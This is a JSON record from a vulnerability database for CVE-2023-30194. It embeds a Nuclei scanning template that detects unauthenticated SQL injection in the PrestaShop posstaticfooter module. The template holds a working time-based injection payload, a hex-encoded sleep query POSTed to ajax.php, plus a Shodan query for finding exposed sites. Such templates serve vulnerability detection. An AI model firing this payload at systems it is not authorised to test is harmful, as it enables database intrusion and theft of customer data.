{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-30194/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-30194/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-30194/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-30194/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-30194/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-30194"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-30194"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-30194.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-30194\n\ninfo:\n  name: Prestashop posstaticfooter <= 1.0.0 - SQL Injection\n  author: daffainfo\n  severity: critical\n  description: |\n    Prestashop posstaticfooter <= 1.0.0 is vulnerable to SQL Injection via posstaticfooter::getPosCurrentHook().\n  impact: |\n    Unauthenticated attackers can execute arbitrary SQL commands to extract database contents including customer data, orders, payment information, and administrative credentials from the PrestaShop database.\n  remediation: |\n    Upgrade to the latest version of the posstaticfooter module from posthemes.\n  reference:\n    - https://friends-of-presta.github.io/security-advisories/modules/2023/05/09/posstaticfooter.html\n    - https://themeforest.net/user/posthemes/portfolio\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-30194\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-30194\n    epss-score: 0.32413\n    epss-percentile: 0.98275\n    cwe-id: CWE-89\n    cpe: cpe:2.3:a:prestashop:poststaticfooter:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: prestashop\n    product: poststaticfooter\n    shodan-query: html:\"posstaticfooter\"\n  tags: cve,cve2023,prestashop,poststaticfooter,sqli,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'prestashop'\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 20s\n        POST /modules/posstaticfooter/ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        module_id=1%22;select(0x73656C65637420736C6565702836293B)INTO@a;prepare`b`from@a;execute`b`;--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration>=6\"\n          - contains(body, '\\\"[]\\\"')\n          - \"status_code == 200\"\n        condition: and\n# digest: 490a004630440220092435639e212634c9b2399f9a1e286ef241ec84b090288832de64a77b25c87302207afb15023e60baf12732bc0be53188c91a7337be7288371dbc5bffeaac874a81:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-30194"
}